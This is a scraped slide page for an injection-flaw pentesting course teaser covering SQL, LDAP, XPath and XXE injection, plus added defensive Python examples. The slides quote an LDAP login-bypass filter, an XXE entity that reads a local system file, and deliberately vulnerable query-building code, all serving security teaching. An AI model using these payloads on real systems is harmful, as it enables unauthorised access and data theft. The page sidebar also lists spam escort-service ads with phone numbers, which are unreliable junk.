Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
 

Recently uploaded

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
DianaGray10
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
ZachWylie3
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
maigasapphire
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
bhumivarma35300
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Zilliz
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
SynapseIndia
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
KIRAN KV
 
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdfLeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
SelfMade bd
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 

Recently uploaded (20)

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
 
The History of Embeddings & Multimodal Embeddings

Injection flaw teaser

  • 1. The Art Of Exploiting Injection Flaws
    Sumit Siddharth
    sid@notsosecure.com
  • 2. About the course
    ▪ Hands-on 2 days training
    ▪ Requires out-of-the-box thinking (strong coffee recommended!)
    ▪ 20 exercises, 100 slides, 8 CTFs!
    ▪ Previous feedback:
    ▪ “This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid”
    ▪ “I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid”
  • 3. About Me
    Sumit “sid” Siddharth
    ▪ Speaker/Trainer at Black Hat, Def con, OWASP Appsec, HITB, Ruxcon etc
    ▪ My blog: www.notsosecure.com
    ▪ Specialist in Application & Database Security!
    ▪ More than 8 years of Pentesting!
    ▪ Co-author: SQL Injection, attacks and defense
    ▪ Head of Penetration testing @ 7Safe
  • 4. Day 1: SQL Injection
  • 5. Exploiting SQL Injections
    ▪ Authentication Bypass
    ▪ Extracting Data
    ▪ Error Message Enabled
    ▪ Error Message Disabled
    ▪ Union Injection
    ▪ Blind Injection
    ▪ Time Delays
    ▪ Out Of Band Channels
    ▪ Privilege Escalation
    ▪ OS code execution
  • 6. Exercise 9.8 – SQL Injection: OS command execution
    ▪ http://hacklab.net/hackme_7.5/
    ▪ Objective
    ▪ Exploit SQL injection to run OS commands on the database server
    ▪ CTF: What are the contents of C:secret.txt on the server
    ▪ Time
    ▪ 10 mins
  • 7. Advanced SQL Injection
    ▪ Insanely Blind SQL Injection
    ▪ Application returns the same response
    ▪ Injection point in INSERT/UPDATE statement
  • 8. Encoding/Decoding User Input
    ▪ Base64 decoding user input
    ▪ Hex decoding user input
    ▪ Real world examples
    ▪ WordPress Admin-Ajax.php unauthenticated SQL injection
    ▪ PHP-Nuke auth.php
      $cookie=explode(';', urldecode(empty($_POST['cookie'])))
      $admin=base64_decode($admin)
  • 9. SQL Injection in SQL Names
    ▪ Consider the following:
      Dim cat, orderBy, query
      cat = Replace(Request.Form("cat"), "'", "''")
      orderBy = Replace(Request.Form("orderBy"), "'", "''")
      query = "SELECT * FROM prod WHERE cat = '" & cat & "' ORDER BY " & orderBy
  • 10. Hacking Oracle from Web
    ▪ Exploiting SQL Injection against an Oracle database
    ▪ How to extract data
    ▪ One Query to get them all!
    ▪ How to execute OS code
    ▪ What if we are not DBA
    ▪ Become DBA
    ▪ Execute OS code
    ▪ Drop DBA
  • 11. Capture The Flag: SQL Injection
    ▪ http://hacklab.net/ctf.asp?data=foobar
    ▪ Objective: What’s in C:secret.txt
    ▪ Time: 20 Mins!
    ▪ No instructions or hints this time!
  • 12. Day 2: The Art of Exploiting Lesser Known Injection Flaws
    ORM Injection
    LDAP Injection
    Advanced LDAP Injection
    XPath Injection
    Xpath v2
    XML Entity Injection
    Combining Xpath and XXE
    CTF
    Q&A
  • 13. Hibernate Query Language Injection
    ▪ User’s input is passed directly to the underlying SQL engine:
      List<Event> result = session.createQuery("from Event e where e.title='" + param + "'").list();
  • 14. HACKING LDAP
    LDAP overview
    LDAP injection
    Blind LDAP injection
    Hacking LDAP in practice
    Securing Applications Against LDAP Injections
  • 15. LDAP Injection: Authentication Bypass
    ▪ (&(user=username)(password=pwd))
    ▪ Usually the password is hashed and then matched with the stored value
    ▪ Injection is most likely to work only in the username field
    ▪ (&(user=username)(password=*))
    ▪ (&(user=username)(&))(password=pwd))
      Anything after the first filter will be ignored by OpenLDAP
  • 16. Exercise 6
    ▪ http://hacklab2.net:81/ldap/selfservice/
    ▪ PHP/LDAP
    ▪ Find the telephone number of employee Eric Philip
    ▪ Time: 10 mins
  • 17. XPATH Injection
    ▪ Agenda
    ▪ What is XPATH
    ▪ Exploiting XPATH
    ▪ Impact of XPATH exploitation
    ▪ Blind XPATH Injection
    ▪ Automating XPATH Injection
    ▪ XPATH v2 injection
    ▪ Insane XPATH Injection
    ▪ Defending against XPATH Injection
  • 18. XPATH’s XML Nomenclature
    (diagram; labels: Root node, Comment, Node name, Attribute value, Node, Node value, Attribute name, Node)
  • 19. Automating Xpath
    ▪ XPATH Explorer
    ▪ Demo time!
  • 20. XPath 2.0 Features..
    ▪ Hugely increased feature set
    ▪ Regular expressions
    ▪ Unicode normalization
    ▪ String to code point conversion
    ▪ Remote document references
    ▪ All of these can be utilised to speed up document retrieval and reduce the key space we have to search.
  • 21. XPATH 2.0
    ▪ Allows reading not just the current XML file but any arbitrary XML file on the file system.
  • 22. Hacking Web Services with XML External Entity
    ▪ Not validating the XML files before processing them
    ▪ Attacker can inject an external entity
      <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
    ▪ The web service parses the entity and the parser accesses the local resource
    ▪ Unauthorized access to information
    ▪ Port scanning
    ▪ Denial of service attack
    ▪ Breaking the XML syntax
    ▪ Providing files like /dev/urandom
  • 23. Combining XXE and Xpath
    ▪ Did I say, with Xpath 2.0 you can read arbitrary xml files on the file system.
    ▪ I actually mean: with Xpath 2.0 you can read arbitrary xml files on the file system.
    ▪ Introducing Xcat
  • 24. Thank You!
    ▪ Questions please...
    ▪ Sid@notsosecure.com
    ▪ Twitter: notsosecure
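Slide 9 and editor's note 2 make the point that doubling single quotes protects only the quoted `cat` value; `orderBy` lands in an identifier position that is never quoted, so the escaping does nothing for it. The following added example (not code from the deck or from 7Safe) translates the slide's VBScript to Python, shows the escape leaving the ORDER BY value untouched, and pairs it with the hardened form: a bound parameter for `cat` and an allow-list for `orderBy`. The `prod` table schema and rows are constructed for the demo.

```python
import sqlite3

# Constructed sample rows standing in for the slide's `prod` table (hypothetical schema).
SAMPLE_ROWS = [("Zed", "books", 10.0), ("Alpha", "books", 5.0), ("Mid", "toys", 7.0)]
# Identifiers cannot be bound as parameters, so ORDER BY is limited to a fixed set.
ALLOWED_ORDER_BY = {"name", "cat", "price"}


def escape_quotes(value: str) -> str:
    """The slide's Replace(x, "'", "''"): doubles single quotes and nothing else."""
    return value.replace("'", "''")


def build_query_vulnerable(cat: str, order_by: str) -> str:
    """Straight translation of the slide's VBScript. Both inputs are quote-escaped,
    but orderBy is never placed inside quotes, so the escaping does not constrain it."""
    return ("SELECT * FROM prod WHERE cat = '" + escape_quotes(cat)
            + "' ORDER BY " + escape_quotes(order_by))


def is_allowed_order_by(order_by: str) -> bool:
    """Allow-list check for the identifier position."""
    return order_by in ALLOWED_ORDER_BY


def build_query_safe(cat: str, order_by: str):
    """cat becomes a bound parameter; order_by must be one of the known columns."""
    if not is_allowed_order_by(order_by):
        raise ValueError(f"order_by not permitted: {order_by!r}")
    return f"SELECT name FROM prod WHERE cat = ? ORDER BY {order_by}", (cat,)


def run_safe(cat: str, order_by: str) -> list:
    """Execute the hardened query against an in-memory copy of the sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prod (name TEXT, cat TEXT, price REAL)")
    conn.executemany("INSERT INTO prod VALUES (?, ?, ?)", SAMPLE_ROWS)
    sql, params = build_query_safe(cat, order_by)
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    # The quote in cat is doubled; whatever is in orderBy goes through verbatim.
    print(build_query_vulnerable("O'Reilly", "name; x"))
    print(run_safe("books", "price"))
```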
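Slide 15 shows how an unescaped username turns the two-assertion login filter into something else, and that OpenLDAP ignores text after the first complete filter. The added example below (not from the deck; the filter builders and the escape table are my own) applies RFC 4515 value escaping so `*`, `(`, `)`, `\` and NUL stay literal, and adds a balance check a server-side guard can run to confirm the final string is exactly one parenthesised expression.

```python
# RFC 4515 escapes for characters that are special inside a filter value.
# Each character is translated at most once, so one pass is sufficient.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def ldap_escape_filter_value(value: str) -> str:
    """Escape a user-supplied value before placing it in a search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password_hash: str) -> str:
    """The slide's filter built by raw concatenation (the vulnerable form)."""
    return f"(&(user={username})(password={password_hash}))"


def build_login_filter(username: str, password_hash: str) -> str:
    """Hardened form: both values are escaped, so a ')' or '*' in the username
    remains data and the filter keeps exactly its two assertions."""
    return (f"(&(user={ldap_escape_filter_value(username)})"
            f"(password={ldap_escape_filter_value(password_hash)}))")


def filter_is_balanced(ldap_filter: str) -> bool:
    """True only if the string is a single parenthesised expression with no
    trailing text (the part OpenLDAP would silently ignore, per the slide)."""
    if not ldap_filter.startswith("("):
        return False
    depth = 0
    for i, ch in enumerate(ldap_filter):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and i != len(ldap_filter) - 1:
                return False  # closed early; something follows the filter
    return depth == 0


if __name__ == "__main__":
    # The slide's second example: a username that closes the filter early.
    for build in (build_login_filter_unsafe, build_login_filter):
        f = build("username)(&)", "pwd")
        print(f, "balanced" if filter_is_balanced(f) else "NOT balanced")
```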
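Slide 22 attributes XXE to XML being parsed without validation, so the parser resolves whatever entity the document declares. The added example below (mine, not the deck's; it uses only Python's stdlib expat bindings) is the matching defensive check: it rejects any DOCTYPE or entity declaration, including the `pwned` entity quoted on the slide, before the parser could resolve anything. The two XML samples are constructed for the demo.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


def parse_rejecting_entities(xml_bytes: bytes) -> list:
    """Parse with expat, refusing DTD/entity declarations up front.
    Returns the element names seen, in document order."""
    parser = expat.ParserCreate()
    # Never read parameter entities or fetch an external DTD subset.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE not allowed (root declared as {name!r})")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXmlError(f"entity declaration not allowed: {name!r}")

    seen = []
    parser.StartDoctypeDeclHandler = reject_doctype   # fires before any <!ENTITY>
    parser.EntityDeclHandler = reject_entity          # belt and braces
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(xml_bytes, True)  # a handler exception propagates out of Parse
    return seen


def check_xml(xml_bytes: bytes):
    """Request-handler wrapper: (accepted, element list or reason)."""
    try:
        return True, parse_rejecting_entities(xml_bytes)
    except UnsafeXmlError as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"


# Constructed samples: a benign body and one carrying the slide's entity.
BENIGN = b"<order><item>widget</item></order>"
XXE_SAMPLE = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE order [ <!ENTITY pwned SYSTEM "file:///c:/boot.ini"> ]>'
              b"<order><item>&pwned;</item></order>")

if __name__ == "__main__":
    print(check_xml(BENIGN))
    print(check_xml(XXE_SAMPLE))
```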

Editor's Notes

  1. Is following exercise ready? Not sure what it has to do with this slide
     Exercise: SQL Injection in cookies
  2. MS-SQL escape quotes by doubling them
     What’s the problem? Orderby part does not require string to be vulnerable
  3. Run through Instructor Introduction first, having:
     - changed name on slide 2
     - ensured correct instructor slide unhidden